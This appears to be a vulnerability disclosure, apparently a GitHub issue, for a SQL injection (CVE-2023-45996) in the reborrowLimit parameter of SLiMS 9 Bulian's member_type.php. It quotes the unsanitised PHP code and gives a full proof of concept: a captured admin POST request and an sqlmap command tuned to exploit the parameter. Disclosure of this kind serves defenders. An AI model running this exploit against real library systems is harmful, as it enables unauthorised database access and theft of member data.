Headline
CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian
SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.
The Bug
A SQL Injection has found in admin/modules/membership/member_type.php at the code below
$data['member_type_name'] = $dbs->escape_string($memberTypeName);
$data['loan_limit'] = trim($_POST['loanLimit']);
$data['loan_periode'] = trim($_POST['loanPeriode']);
$data['enable_reserve'] = $_POST['enableReserve'];
$data['reserve_limit'] = $_POST['reserveLimit'];
$data['member_periode'] = $_POST['memberPeriode'];
$data['reborrow_limit'] = $_POST['reborrowLimit'];
$data['fine_each_day'] = $_POST['fineEachDay'];
$data['grace_periode'] = $_POST['gracePeriode'];
$data['input_date'] = date('Y-m-d');
$data['last_update'] = date('Y-m-d');
To Reproduce
Steps to reproduce the behavior:
Login as admin or user that has access membership type
Make sure the burp application is turned on to capture the request as screenshot below
Save the request in a separate file (sample.reg)
sample.reg example
POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
Host: localhost
Content-Length: 1420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
Connection: close
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="csrf_token"
29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="form_name"
mainForm
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberTypeName"
abcdef
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanLimit"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanPeriode"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="enableReserve"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reserveLimit"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberPeriode"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reborrowLimit"
4423
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="fineEachDay"
1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="gracePeriode"
0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="saveData"
Update
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="updateRecordID"
2
------WebKitFormBoundaryQUBKpazqdLdsHspa--
run the test with the following command:
sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
- You’ve entered into the system
Screenshots
Versions
- OS: Windows
- Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
- Slims Version: slims9_bulian-9.6.1